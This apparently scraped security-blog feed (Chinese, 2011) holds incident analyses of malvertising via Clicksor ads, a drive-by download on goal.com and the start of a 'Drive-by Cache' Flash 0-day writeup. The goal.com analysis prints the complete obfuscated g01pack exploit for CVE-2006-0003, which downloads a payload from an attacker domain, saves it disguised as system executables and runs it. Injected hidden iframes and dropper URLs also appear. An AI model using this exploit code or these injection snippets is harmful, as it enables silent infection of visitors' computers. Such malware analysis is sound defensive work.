<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-dskhzszgJpE/TctCwh1dK2I/AAAAAAAAAC4/dxz70YWbF0Q/s1600/case01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="76" src="http://3.bp.blogspot.com/-dskhzszgJpE/TctCwh1dK2I/AAAAAAAAAC4/dxz70YWbF0Q/s640/case01.png" width="640" /></a></div><pre class="brush: html;"><div><a href="http://personnelagency.org/" target="_parent"><img src="http://personnelagency.org/banners/768x90.gif" border=0></a><iframe src='http://2trotlug.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe></div></pre>4. http://2trotlug.in/bcounter.php?u=ben<br />
<pre class="brush: html;"><iframe width='34' height='44' frameborder='0' scrolling='no' src='http://goodpersonnecounter.com/ts/in.cgi?ben'></iframe></pre>5. Exploit URL:<br />
<pre class="brush: html;">http://goodpersonnecounter.com/ts/in.cgi?ben</pre>6. Dropped Binary:<br />
<pre class="brush: html;">http://194.247.58.50/dlf.php?i=15</pre><br />
另外根據我們在Alexa Top一百萬大網站的統計中,Clicksor的用戶約佔2%以上,也就是同時會有超20,000個網站受到影響,只要有瀏覽過包含Clicksor廣告的網站,都有可能受到感染。<br />
</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-7927366671442780452?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=YegzRp24qWE:okCiGaP9k5k:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=YegzRp24qWE:okCiGaP9k5k:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=YegzRp24qWE:okCiGaP9k5k:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=YegzRp24qWE:okCiGaP9k5k:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/YegzRp24qWE" height="1" width="1"/>Chrishttp://www.blogger.com/profile/01653790213029148763noreply@blogger.com0http://armorize-cht.blogspot.com/2011/05/clicksor_16.htmltag:blogger.com,1999:blog-1441759431140700676.post-75524653040700746332011-05-10T15:04:00.002+08:002011-05-17T23:25:57.183+08:002011-05-17T23:25:57.183+08:00知名足球網站(goal.com)散播惡意程式(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-Dvqs2nT7HKk/Tb6QhMxwMWI/AAAAAAAACO0/4x83jfXHPNw/s1600/goal_com_drive_by_download_exploit.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/-Dvqs2nT7HKk/Tb6QhMxwMWI/AAAAAAAACO0/4x83jfXHPNw/s1600/goal_com_drive_by_download_exploit.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5602073886535463266" /></a><br />1. 根據<a href="http://siteanalytics.compete.com/goal.com/">compete.com</a>,goal.com每一天平均有232,116個人瀏覽<br />2. 根據<a href="http://www.checksitetraffic.com/traffic_spy/goal.com">checksitetraffic.com</a>,每一天則有215,989人<br />3. goal.com在Alexa<a href="http://www.alexa.com/siteinfo/goal.com">alexa.com</a>全球的排名是Rank. 379<br /><br />HackAlert最近在4/27~4/28中偵測到有Drive-By-Download的行為。根據我們所觀察到的,我們相信攻擊者具有能夠進入goal.com系統內部的權限,同時僅在4/27~4/28中測試攻擊的效果。<br />以下是我們的技術報告:<br /><br /><b>[摘要]</b><br /><br />A. 根據我們所搜集到的資料,有部份的goal.com似乎已經被感染且允許攻擊者操控其網頁內容。受感染網站可能存在供攻擊者持續使用的後門程式,用以控制該網站。<br /><br />B. 我們認為這次的攻擊不屬於一次性的mass-SQL injection攻擊,因為相關惡意網域並未出現在其他被感染的網站中。<br /><br />C. 惡意網域包含:<br />1. pxcz.cz.cc (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=pxcz.cz.cc">Google SafeBrowsing</a> 標示為黑名單)<br />2. opofy7puti.cz.cc (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=opofy7puti.cz.cc">Google SafeBrowsing</a> 標示為黑名單)<br />3. justatest.cz.cc (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=justatest.cz.cc">Google SafeBrowsing</a> 標示為黑名單)<br /><br />這些線索顯示這是一個針對goal.com所發動的攻擊。<br /><br />D. 持續散播時間為4/27~4/28,攻擊者似乎是使用這段時間來測試攻擊的效果,而在這段時間被我們的Scanner掃到。<br /><br />E. 被我們採樣到的攻擊碼會針對以下的弱點進行攻擊:CVE-2010-1423 (Java), CVE-2010-1885 (MS help center HCP), CVE-2009-0927 (PDF), and CVE-2006-0003 (MS MDAC)<br /><br />F. 使用的是g01pack exploit pack,與一般的exploit pack不同的是他包含了一個假的admin管理頁面,攻擊者可透過這個假的"honeynet"來觀察是誰在做進一步的調查。<br /><br />G. 攻擊碼本身做了相當程度的"變形",在這邊我們不用"混碼"這個字詞的原因是:除了混碼之外,攻擊碼本身就使用了有別於以往的方式來規避偵測。<br /><br />H. 惡意程式本身透過UPX來進行加殼,會修改系統中的setupapi.dll及sfcfiles.dat。當我們第一次傳送到VirusTotal時,僅有四家防毒廠商(<a href="http://www.virustotal.com/file-scan/report.html?id=9f8d7399d6985363c69273460312b9d28c365b6a8844c80cc310d72b002c2e97-1303955707">4 / 41</a>)標示其為惡意。<br /><br />I. 惡意程式會連到以下網域:<br /><br />1. testurl.ipq.co:80 (UK) (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=testurl.ipq.co">Google SafeBrowsing</a> 標示為黑名單)<br />2. 74.125.47.99:80 (US),反解得到coldgold.co.uk (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=coldgold.co.uk">Google SafeBrowsing</a> 標示為黑名單)<br />3. banderlog.org (沒有被任何一家防毒廠商/<a href="http://www.google.com/safebrowsing/diagnostic?site=banderlog.org">Google SafeBrowsing</a> 標示為黑名單,但是在<a href="http://support.clean-mx.de/clean-mx/viruses.php?ip=127.0.0.1&sort=first%20desc">clean-mx.de</a>可以看到他的蹤跡)<br /><br /><b>[詳細資訊]</b><br /><br />在<a href="http://www.openwaves.net/goal_com_infection/goal_com_malware_infection.zip">這裡</a>可以下載我們側錄的感染記錄檔。包含了在用瀏覽器瀏覽時所產生的Http Traffic,從開始瀏覽網站到惡意程式本身透過瀏覽器被下載下來。<br /><br />整個感染鏈為:<br />1. goal.com,包含iframe指向pxcz.cz.cc<br />2. pxcz.cz.cc 內包含iframe指向justatest.cz.cc<br />3. justatest.cz.cc內包含攻擊程式碼(g01pack exploit pack),會依照使用者的瀏覽器不同提供不同的攻擊碼<br />4. 攻擊碼成功執行,從justatest.cz.cc下載惡意程式<br />5. 惡意程式連結到testurl.ipq.co (UK),74.125.47.99:80 (US, coldgold.co.uk),及banderlog.org<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-bMyCmn0NSfQ/Tb7Rg08eo7I/AAAAAAAACPU/o-RwWkubW24/s1600/goal_com_infection_chain2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/-bMyCmn0NSfQ/Tb7Rg08eo7I/AAAAAAAACPU/o-RwWkubW24/s1600/goal_com_infection_chain2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5602145348393804722" /></a>整個感染鏈從http://www.goal.com/en/開始:<br /><pre class="brush: html;"><p>Arjen Robben has admitted that his future lies with the German and European giants, hinting that he could even remain there for the rest of his career <style type="text/css">#yxvim {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style><iframe id="yxvim" src="http://pxcz.cz.cc/ad.jpg"></iframe></p></pre><br />攻擊者在上述HTML語法的後面加上了一個iframe指向pxcz.cz.cc。pxcz.cz.cc包含了另一個iframe指向justatest.cz.cc,justatest.cz.cc則同時包含了攻擊碼(g01pack)及惡意程式本身。這個g01pack比較特殊的部份是他同時包含了一些假的Admin頁面,這個Admin頁面支援一些常見的帳號密碼(比如Admin / Admin),用來讓分析人員相信他們成功的穫取了g01pack管理頁面的權限。<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-kqIMC_gcojg/Tb7KnnBJ2PI/AAAAAAAACPE/IPmZZ8dQxC4/s1600/goal_com_g01pack_fake_admin.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/-kqIMC_gcojg/Tb7KnnBJ2PI/AAAAAAAACPE/IPmZZ8dQxC4/s1600/goal_com_g01pack_fake_admin.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5602137768333007090" /></a><br />一旦成功登入之後,呈現在分析者眼前的是攻擊者造假的數據,在此同時,攻擊者則可透過這個行為,了解有哪些人正在嘗試分析這個惡意網域。<br /><span class="fullpost"><br />這次事件中的攻擊碼經過相當程度的"變形",有別於以往的混碼技術,讓分析人員無法一眼即看出其為攻擊碼。TExploit pack本身包含了許多組攻擊碼,在此我們僅秀出利用CVE-2006-0003 (MS MDAC)漏洞的攻擊碼。此段攻擊碼可以在<a href="http://www.openwaves.net/goal_com_infection/goal_com_malware_infection.zip">這裡</a>取得。<br /><pre class="brush: html;"><html>en clonus purins knot ghat inlier sine bipeds obese tart.<body>heroins pallors glugs. Opera. Pyx ducted boss shea abele knot hajes eh moot nisi tickled howl pangens bobs blind stir reinked ajee.atria obese saddle. Nisi uh bracts pyx.bipeds abaft arctic brave arabic purins blind polo. Pyx pallors. Sludge atria noisy bug slojd stow dumps. Kappa sri tawse bracts hank.fresco delta. Caldron arctic bucko sine byre inlier haeres.<script>var test;function redirect(){location.href="?topic_id=6.0&forum_id=qtest&action=MSIE&nid=name&year=c&start=2&thread_id=53585053&rid=708";}setTimeout(redirect, 20000);var move=new String("openul0".substr(0,4));var out=["ctfmon",String("javaWI8X".substr(0,4)),new String("acro"+"bat"),new String("explore"+"rC52".substr(0,1)),String("useri"+"nit"),"chromeHkpS".substr(0,6),"svch"+"ostc"];var follow="Sav"+"eTo"+"Fil"+"e";var air;var family=1;var low=6000;var never=";";var now=String("setTimeout");var sun=0;var age="";var turn=[];var have=["spellOver","play","cross"];this.few=29107;this.few-=150;var begin;var useDrive="clsid:BD9oqk".substr(0,9)+"6C556-65ANEm".substr(0,9)+"3-11D0-98rWqE".substr(0,9)+"3A-00C04F"+"ZuqC29E36uqZ".substr(3,6);var stay=new String("she"+"lle"+"xec"+"ute");var then=new String("replaceUyK".substr(0,7));var once=new String("typeUdm".substr(0,4));var ground=["youUnder","home","base"];var own=new String();var meLittle="setAttrT2hF".substr(0,7)+"ibute5MEY".substr(0,5);var will=new String("pus5ceI".substr(0,3)+"9BUhU9B".substr(3,1));var most=2;var best="send";var teachSeem="";var star="";try {} catch(mark){};var strong;var bed="Close";var end="Wri"+"te";var pass="http://opofy7puti.cz.cc:80/domains/f848af41f9d81c1603fb52a6b7844642.php?start=12&thread_id=53585053&forum_id=qtest&";var readAmong="CreateObjec"+"t";var redDog="responseBo"+"dyck4".substr(0,2);function oh(){sea=[];want=18559;want++;try {var book="ourPiece"} catch(book){};var they="";come=["northTurn","set","above"];change={};if(pass.indexOf(never) > -1){var groundMight=new Array();this.strongLess=978;this.strongLess++;call={word:10445};var writeHim=["comeWould"];var serve="";var stopYes="";hand=25269;hand-=192;school = pass.split(never);var good={his:20957};var turnBoy=false;this.travel="travel";add=16993;add--;var should="";for(var i in school){var govern="";this.airMark=false;place=27537;place-=204;try {var run="familyCommon"} catch(run){};var yetNeed=new String();var quick = school[i][then](/^\s+|\s+$/g, age); var music="";this.plant=459;this.plant-=142;var underHad="";fall={};yetFarm=6780;yetFarm-=19;var shape=29557;if(quick != age){var make=false;var their={high:"down"};plane={yes:"front"};turn[will](quick);wood={blue:8491};ohEat=17592;ohEat+=255;this.road="road";}}} else {var thereLarge=new String();var yesWheel=new String();var saw=["shortSleep","stayCommon","heard"];this.yourLeave="yourLeave";var table=23075;turn[will](pass);var turnYet="turnYet";var friendPound={newBody:"studyNotice"};} dryCity={callChange:16908};this.passPeople=8404;this.passPeople--;var drive=[];var able="";var willTake="willTake";return turn;}var foodThough=new String();try {} catch(veryStrong){};this.moveEarth=7491;this.moveEarth+=102;this.someOpen=26120;this.someOpen++;function than(again, point){life=["simple"];knowGround=24748;knowGround--;figureFigure=30877;figureFigure-=200;var does=new String();var sleepFace=["orWalk","inch","cold"];yourSlow=775;yourSlow+=122;what=[];a=21635;a+=166;test[meLittle](again, point);}northBeauty={watch:"fewLove"};var line={};var head=22943;var piece=32549;function the(){var pose=20499;var frontCross=4606;ago=7777;ago+=220;if(!free()) return;serveWell=25614;serveWell++;objectWorld=24863;objectWorld-=114;darkCommon=22684;darkCommon++;var willPerson=new Array();test=document.createElement(new String("object"));than(new String("classi"+"d"), useDrive);var moveEarly="moveEarly";this.moonHome="";bedPower={since:false};than("id", "test");try {strong = test[readAmong]("Shell.A9kDj".substr(0,7)+"DH0pplicat0HD".substr(3,7)+"MrbionMbr".substr(3,3),age);find=[];this.learn="";hold=[];air = test[readAmong]("adodb.strea"+"mnXk".substr(0,1),age);this.why=19607;this.why++;var rest=new Date();var him="";var turn = oh();this.differ="differ";var sawAmong=["moneyAt","moreA","boyMuch"];var stopSun=["letter","pound","young"];var sideHeat=["white","spellAbove"];var thoseFirst=["northFact","needCome"];doesRock=17386;doesRock--;if(turn.length <= 0) return false;which=["i","took","fish"];agoOld=["laughOften","seemOrder","figureGreen"];var runHalf={cut:27153};var schoolOut=["differGot","wonder","poseNotice"];for(var i=sun; i < turn.length; i++){var fromLong=new Date();var haveSlow=new String();var ifCover=["finalDone","againOnly"];var unitIt=[];pullTown={leadOut:"deepMade"};var decide=[];this.both=22541;this.both++;var unit = out[i % out.length];var enough = turn[i];goodDrive={water:"cry"};secondCenter=[];var endDiffer=false;var your = "./."+"./yzvw".substr(0,2) + unit + new String(".exe");this.dont=18287;this.dont--;try {var faceAppear="fewReal"} catch(faceAppear){};var voicePoint=low * i;var shortPlane=["heatRule"];var knew="";try {var shapeCause="ageHave"} catch(shapeCause){};dryLook=[];meanFar(new String(enough), new String(your));var right=23685;try {} catch(feel){};try {} catch(hisTree){};var had=new Date();}} catch(e){}}function longSaid(stoodTree){planeIt={};var shouldSide=8362;northAmong={faceMade:false};var windReal="windReal";cutOften=["riverPiece","orderWater","commonLay"];nowSay=["bodyAlso"];begin = test[readAmong]("msxml2.XMLO4eW".substr(0,10)+"HTTP", age);var planeTop=new Date();whichThem={shipSame:26359};var fatherIdea=24125;var there=16243;begin[move]("GET", stoodTree);asAmong=["seaFew"];whileRun=["warDrive"];this.feetSing=7842;this.feetSing--;begin[best]();var thatWhen="thatWhen";this.hisNever="hisNever";story=9303;story+=10;return begin[redDog];}function free(){var thereWrite={strongPaper:false};this.keepLot="";return (document.body.style.textOverflow != undefined);}function meanFar(stoodTree,color){var wentMother=["turnTalk","staySleep","she"];this.largeRed=28365;this.largeRed-=184;eat=["atMove"];var found={shouldPlay:"figureStep"};try {var standMother=3260;toward=26805;toward++;var actPress="";try {var work="lightCold"} catch(work){};try {var other=new Date();var rainTable=28788;air[bed]();this.coldMake="coldMake";fatherUs=["andFast","hour"];} catch(stand){}this.lastTheir=29388;this.lastTheir--;var downStrong={topWas:11226};try {var answerWater="servePaper"} catch(answerWater){};power=longSaid(stoodTree);peopleHad=["kingRiver"];this.house=4015;this.house++;air[once]=family;cameWho={hasEye:"bringForce"};foodEast=["feetThat","shortHave"];air[move]();happenUs=["fewMany","butWell"];var helpRound=27891;air[end](power);drawHome={number:721};surePage={late:false};air[follow](color,most);try {var cryFarm="putFollow"} catch(cryFarm){};var plantClear="";air[bed]();try {var meEver="shapeDark"} catch(meEver){};try{var whyRule=["slow","followNight"];var whiteAnswer=["standWatch","fastKnew"];var sameOff=26811;actCome=["walkHand","even","waterWay"];this.draw=29713;this.draw-=76;strong[stay](color);var clear="";var tellFront=["seemBody"];var lookNumber="";} catch(e){}mayForce=12153;mayForce+=212;var homeMay={unitFirst:false};manAt=8219;manAt+=30;whereSoon=["happenRiver","aboveCause"];cutLive=["wentThere","meanBusy"];}catch(noun) {lessFive=["fishTail","behindYet","ourAgo"];this.same=false;var airSix="";try {var direct=false;var better=["showGrow","factHand"];air[bed]();changeBack={hot:6344};var it=new Array();} catch(first){}helpPlain=["beBig","listen"];}var ageSecond=15826;this.fallThree="";var faceTree=28716;}var sleep=0;var topAnimal=false;function groundMen(){while(sleep++ < 171){groundMen();}if(!topAnimal){topAnimal = true;the();}}groundMen();</script>nisi nebs coalify opera caw add gluts rewon toph reinked bucko web moot.woofer reinked haeres arabic hernia bice blind nebs schmoos stow opera obese snaffle en hajes scow pyx.</body></html></pre></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-7552465304070074633?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=okWRUDalAj4:41grpwbhF5I:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=okWRUDalAj4:41grpwbhF5I:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=okWRUDalAj4:41grpwbhF5I:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=okWRUDalAj4:41grpwbhF5I:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/okWRUDalAj4" height="1" width="1"/>Colanoreply@blogger.com2http://armorize-cht.blogspot.com/2011/05/goalcom.htmltag:blogger.com,1999:blog-1441759431140700676.post-51257993012820277672011-04-27T11:30:00.003+08:002011-04-27T11:32:46.897+08:002011-04-27T11:32:46.897+08:00利用 Flash 0-Day 的掛馬變形手法,攻擊人權網站(作者: Chris Hsiao, NightCola Lin, Wayne Huang, Fyodor Yarochkin, Crane Ku)<br />
<br />
阿碼科技為世界上最大的雲端惡意掃瞄服務的廠商之一,OEM給大型的資安公司及主機供應商。最近我們的Hackalert發現到許多起的偷渡式下載(Drive-by)攻擊都伴隨著零時差攻擊(0-days)。<br />
在最近幾年我們發現到一些有趣的威脅名詞不斷的被創造出來,因此,我們覺得有必要給這次的手法一個獨特的名詞, 我們稱之為:Drive-by Cache。<br />
<br />
以下是這篇報導的幾個摘要:<br />
A. 本次攻擊的手法是Drive-by Download的變種,我們稱之為Drive-by Cache, 這個新的機制相較於傳統的Drive-by Download更難被偵測到。<br />
B. 我們使用到最近被Hackalert scanner所偵測到的一個例子,被感染的網站是一個人權網站, 所利用的漏洞是Adobe flash 0-day: CVE-2011-0611,而HackAlert在一週前偵測到它的當時,是沒有相對應的patch的。<br />
C. 這次事件中的惡意程式本身會連回一個位於香港的伺服器,IP為182.237.3.105。<br />
<br />
更多的總結請見 <a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#forensics-summary">[5. Forensics Summary]</a>.<br />
<br />
[大綱]<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#section-1-drive-by-download">1. Drive-by Downloads的簡介</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#drive-by-cache">2. Drive by cache</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#example">3. 實際案例</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#detection-rates">4. 偵測率</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#forensics-summary">5. Forensics Summary</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#complete-exploit-codes">6. 完整程式碼</a><br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="section-1-drive-by-download"><b>[1. Drive-by Downloads的簡介]</b></a><br />
<br />
一個典型的Drive-by Download感染流程是:使用者瀏覽一個受感染的網頁之後,在未經過使用者的同意,使用者也沒有點選任何連結的情況下,其電腦就被安裝了惡意程式。我們先前的文章:<a href="http://armorize-cht.blogspot.com/2010/12/google%E5%8F%8Amicrosoft%E7%9A%84%E5%85%A9%E5%A4%A7%E5%BB%A3%E5%91%8A%E5%B9%B3%E5%8F%B0%E9%81%AD%E6%8E%9B%E9%A6%AC%E5%88%A9%E7%94%A8%E6%95%A3%E6%92%AD%E6%83%A1%E6%84%8F%E8%BB%9F%E4%BB%B6.html">Google及Microsoft的兩大廣告平台遭掛馬利用散播惡意軟件</a>就是一個最好的例子。<br />
<br />
這種型態的威脅從2000年開始就已經存在,在2003年時透過heap-spraying 的技術被大量的運用。然而,"Drive-by Download"這個名詞直到Google在2003年發表了一篇論文:<a href="http://www.usenix.org/event/hotbots07/tech/full_papers/provos/provos.pdf">"Ghost in the Browser"</a>後,才更具體的被引用。<br />
<br />
下圖簡單的描述這個流程,更詳細的資料請參考我們在2009 Blackhat / DEFCON所發表的<a href="http://www.slideshare.net/wayne_armorize/drivesploit-circumventing-both-automated-and-manual-drivebydownload-%0A%0Adetection">drivesploit 演示中</a>之第15-17頁。<br />
<br />
<a href="http://3.bp.blogspot.com/-XOmOpI6Cnss/Tal8CCO7JkI/AAAAAAAACMo/ZkW_ZWsFiNg/s1600/drive_by_cache_1.PNG" onblur="try
{parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596140386385602114" src="http://3.bp.blogspot.com/-XOmOpI6Cnss/Tal8CCO7JkI/AAAAAAAACMo/ZkW_ZWsFiNg/s1600/drive_by_cache_1.PNG" style="cursor: hand; display: block; margin: 0px auto 10px; text-align: center; width: 750px;" /></a><br />
<span class="fullpost"><br />
第一步,受害者瀏覽一個受感染的網站,這個網站因為存在已知的漏洞,被有心者植入惡意連結,此連結會動態產生iframe或script,將受害者的瀏覽器導向惡意網域。最終瀏覽器會執行到惡意網域上的惡意攻擊碼(exploit code),這些程式碼大部份都是javascript或flash。在本次事件中,該exploit code所利用的是Adobe flash 0-day <a href="http://www.adobe.com/support/security/bulletins/apsb11-07.html">CVE-2011-0611</a> 這個漏洞。<br />
<br />
第二步,瀏覽器在執行了exploit code之後,會強制瀏覽器去執行某些指令(shellcode)。這些指令通常都是請瀏覽器連上某個特定的Url(大部份的情況下是外部網域)。<br />
<br />
第三步, 瀏覽器依照這些指令將某個Url上的檔案抓下來存在受害者本機上並且執行。<br />
<br />
對一般透過靜態特徵碼(pattern)來偵測的防毒軟體來說,要偵測Drive-by Download並不是一件容易的事。這是因為這類exploit code都是透過script來達成(javascript或是flash actionscript),這類語言可以在執行期間使用大量的混碼技巧動態的產生各種不同的形式給客戶端去執行,就像我們在drivesploit presentation中使用到的技巧類似。<br />
<br />
收集這類型隨機產生的pattern不僅對偵測率沒有多大的幫助,反而會因為無窮無盡的pattern讓自己的資料庫無止盡的增加,亦同時增加偵測時間。<br />
<br />
行為偵測則對於此類型的偵測相當的有效,因為以Drive-by Download來說,他的行為模式是一致的且可以被有效的定義:<br />
透過hooking Browser(及javascript engine)呼叫特定API的方式,我們可以看到一序列固定的步驟<br />
A. 瀏覽器瀏覽一個網頁 (受害者瀏覽一個被感染的網頁)<br />
B. Exploit Code被成功執行, 瀏覽器因此開始執行經由exploit code產生的shellcode<br />
C. 瀏覽器呼叫urlmon.dll中的URLDownloadToFile(),這個呼叫會去特定的網址抓檔案之後存在本機電腦上<br />
D. 瀏覽器執行該檔案<br />
<br />
這些shellcode都偏好讓瀏覽器去呼叫一些特定的API,比如:URLDownloadToFile(),在目前的exploit-db網站上,就有<a href="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=download&filter_exploit_text=&filter_author=&filter_platform=43&filter_type=4&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=">8 drive-by download shellcodes</a>,而這8個shellcode都是利用URLDownloadToFile() (即上述中的步驟C)來進行抓取遠端檔案的動作。<br />
<br />
<a href="http://2.bp.blogspot.com/-hOfOCRfoGhs/Tapx5son-KI/AAAAAAAACNI/TkSS2jaeIj8/s1600/shellcode_exploit_db.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596410723009296546" src="http://2.bp.blogspot.com/-hOfOCRfoGhs/Tapx5son-KI/AAAAAAAACNI/TkSS2jaeIj8/s1600/shellcode_exploit_db.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
<br />
但是, 瀏覽器一般來講, 不會主動的去執行URLDownloadToFile(),因此,行為偵測即可有效的透過此一偵測方式來判別瀏覽器是否正在進行惡意行為。<br />
<br />
一般來說,為了繞過各種偵測技術,shellcode必需被設計的越小越好,同時行為也越像瀏覽器越好。要達成這個目的最簡單的方式,就是請瀏覽器去幫忙分擔原本需要shellcode來處理的部份。<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="drive-by-cache"><b>[2. Drive-by cache]</b></a><br />
<br />
而Drive-by Cache正是如此,在整段shellcode執行的過程中,他不會去進行(C)下載檔案的動作。取而代之的是,他是直接從瀏覽器的快取資料夾裡,取出惡意程式並且執行它。<br />
<br />
這也就是為什麼我們把 <b>download</b> 替換為 drive-by <b>cache</b> 的原因。<br />
<br />
至於惡意程式是如此在執行前進入瀏覽器的快取資料夾呢? 我們可以透過下圖來了解:<br />
<a href="http://4.bp.blogspot.com/-CsZUlljlXK8/Tap4dVDm6EI/AAAAAAAACNQ/JuVyKAN1avo/s1600/drive-by-download-drive-by-cache.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596417932225079362" src="http://4.bp.blogspot.com/-CsZUlljlXK8/Tap4dVDm6EI/AAAAAAAACNQ/JuVyKAN1avo/s1600/drive-by-download-drive-by-cache.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
以下是典型的Drive-by Download流程:<br />
(1)瀏覽器讀取網址<br />
(2)瀏覽器執行Exploit Code<br />
(3)瀏覽器執行shellcode<br />
(4)shellcode去遠端下載惡意程式之後儲存在磁碟上<br />
(5)shellcode執行惡意程式<br />
<br />
在Drive-by Cache中,第四步的流程被往前移到第一步與第二步之間,除此之外,原本是透過shellcode來下載的動作反而是透過瀏覽器自己本身來完成這是怎麼達成的呢?<br />
<br />
非常簡單:惡意程式本身被更名為.jpg 或 .js檔後連結到受感染的網址。以這次的事件來看,我們可以看到這段程式碼:<br />
<br />
<pre class="brush: html;"><b><script src=newsvine.jp2></b></pre><br />
這段碼告訴瀏覽器將newsvine.jp2視為javascript,瀏覽器會產生以下動作<br />
(a)讀取這個檔案<br />
(b)將檔案放到瀏覽器的快取資料夾<br />
(c)將newsvine.jp2視為javascript並且執行<br />
當然在(C)的步驟中會失敗,因為newsvine.jp2本身是惡意程式,但是重點是他本身已經被放到瀏覽器的快取資料夾了!<br />
<br />
再次強調一次, 這個儲存的動作是瀏覽器本身的行為而並非shellcode, 而在呼叫惡意程式執行的這一部份,所使用的APIs也必然大不相同<br />
<br />
對一個行為分析引擎來說<br />
a)這是一個非常正常的瀏覽器行為並且沒有不尋常的API呼叫<br />
b)這個動作發生在第一步(瀏覽器讀取網址)之後,因此這不是傳統的Drive-by Download行為<br />
<br />
縱合以上分析,相較於Drive-by Download,Drive-by Cache較能規避現行偵測機制。<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="example"><b>[3. 實際案例]</b></a><br />
<br />
在寫這篇部落格的時候,該人權網站仍然持續被利用,透過Drive-by Cache的手法來散播惡意程式。<br />
HackAlert在第一時間偵測到這種非典型的Drive-by Download攻擊。<br />
<a href="http://4.bp.blogspot.com/-FncX_ZiKYeI/Tax6-5P6JJI/AAAAAAAACOI/llkffhSOxP4/s1600/drive-by-cache-hackalert.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596983657852707986" src="http://4.bp.blogspot.com/-FncX_ZiKYeI/Tax6-5P6JJI/AAAAAAAACOI/llkffhSOxP4/s1600/drive-by-cache-hackalert.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
惡意程式碼片段如下(在網頁原始碼的最下面):<br />
<br />
<br />
<pre class="brush: html;"><b></div><script src="/includes/googlead.js"></script></body></html></b></pre><br />
/includes/googlead.js 組出一個iframe指向惡意網域:<br />
<br />
<pre class="brush: html;"><b>if (document.cookie.indexOf('popad') == -1) {
var e = new Date();
e.setDate(e.getDate() + 1);
e.setHours(0, 0, 0);
e.setTime(e.getTime());
